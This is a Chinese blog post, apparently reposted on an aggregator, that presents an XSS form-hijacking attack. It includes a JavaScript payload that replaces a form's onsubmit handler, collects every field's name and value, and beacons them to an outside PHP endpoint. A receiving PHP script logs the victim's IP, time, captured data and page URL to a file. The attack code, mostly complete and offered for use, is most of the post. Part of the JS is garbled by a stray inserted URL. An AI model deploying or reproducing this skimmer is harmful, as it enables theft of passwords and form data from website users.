首页 > 代码库 > xss 表单劫持(from通用明文记录)
xss 表单劫持(from通用明文记录)
大家都知道,在提交form表单时会调用onsubmit方法,既然调用了onsubmit,说明表单中该填的项肯定都已经填好了,这时,我们通过修改onsubmit方法,便可以获取表单中的信息.
xss.js:
var f=document.forms[‘from1‘]; if(f==undefined) { f=document.getElementById(‘‘); } var func=f.onsubmit; f.onsubmit=function(event) { var str=‘‘; for(var i=0;i<f.elements.length;i++) { str+=f.elements[i].name+‘:‘+f.elements[i].value+‘||‘; } str=str.substr(0,str.length-2); var img=new Image(); img.src=http://www.mamicode.com/‘http://blog.51cto.com/xss.php?data=‘+escape(str)+‘&url=‘+escape(location.href);>
根据各程序不同,修改表单名称
var f=document.forms[‘form1‘];
接收端xss.php
<?php $ip = $_SERVER[‘REMOTE_ADDR‘]; $cookie = $_GET[‘data‘]; $url = $_GET[‘url‘]; $time = gmdate("H:i:s",time()+8*3600); $file = "jzking121.txt" ; $fp=fopen ("jzking121.txt","a") ; $txt= "$ip"."----"."$time"."----"."$cookie"."----"."$url"."\n"; fputs($fp,$txt); ?>
参考:
http://dwblog.github.io/2015/04/29/%E8%A1%A8%E5%8D%95%E5%8A%AB%E6%8C%81/
本文出自 “jzking121' blog” 博客,请务必保留此出处http://jzking121.blog.51cto.com/5436671/1914721
xss 表单劫持(from通用明文记录)
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。